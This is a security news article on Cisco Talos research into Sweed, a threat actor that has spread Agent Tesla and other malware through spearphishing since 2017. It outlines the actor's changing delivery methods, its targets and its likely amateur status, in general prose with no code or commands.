A threat actor named Sweed who has been active for more than two years using spearphishing emails with malicious attachments to spread Formbook, Lokibot and Agent Tesla has been given a detailed examination by Cisco Talos.
Cisco Talos researcher Edmund Brumaghin said for the most part Agent Tesla is the group’s favorite flavor of malware, but noted Sweed has used a variety of delivery methods since 2017.
The first that was used in 2017 had Sweed place a dropper inside a .zip archive containing Agent Tesla and then attached the file to an email claiming to contain a purchase order. The packer used .NET and leveraged steganography to hide and decode a second .NET executable, which uses the same technique to retrieve the final Agent Tesla payload, Brumaghin wrote.
Then in January 2018 Sweed moved on to Java-based droppers, which were also attached to emails claiming to be a purchase or order of some type. The next change for Sweed took place in April 2018 and to exploit the previously known CVE-2017-8759, a vulnerability in Microsoft Office, specifically PowerPoint. Code placed inside a slide triggers the remote code execution vulnerability in Microsoft .NET framework.
The next month Sweed moved on to another Office remote code execution flaw, CVE-2017-11882, and used in fake invoices to again download Agent Tesla.
2019 saw Sweed continuing to use Office, but this time instead of exploiting a vulnerability it leveraged Office macros with email attachments to purported product orders. These could take the form of being an obfuscated VBA macro executing a PowerShell script using a WMI call with the PowerShell script itself being camouflaged using XOR operations. Once decoded the script is revealed to be .NET which then performs a couple of checks and downloads and executes what turns out to be an AutoIT-compiled script.
Other features of Sweed’s operation is it has not regional focus, but attacks countries across the globe, including the U.S. Canada, Russia, China, Singapore and South Africa. The threat actors are also not zeroed in on any particular industry hitting primarily logistics and manufacturing entities with a sprinkling of energy and defense companies for good measure.
Talos was also able to identify an actor on several forums that went by Sweed or Swee D, and actively interacted with that person. The individual claimed to be an ethical hacker, but further investigating found a person with the same name in a forum working with stolen credit card information.
Because these identities were found with relative ease many of the tools used are from easily obtained kits, Brumaghin described Sweed as likely an amateur.
“Based on the TTPs used by this group, SWEED should be considered a relatively amateur actor. They use well-known vulnerabilities, commodity stealers and RATs (Pony, Formbook, UnknownRAT, Agent Tesla, etc.) and appear to rely on kits readily available on hacking forums. SWEED consistently leverages packing and crypting in order to minimize detection by anti-malware solutions,” he said.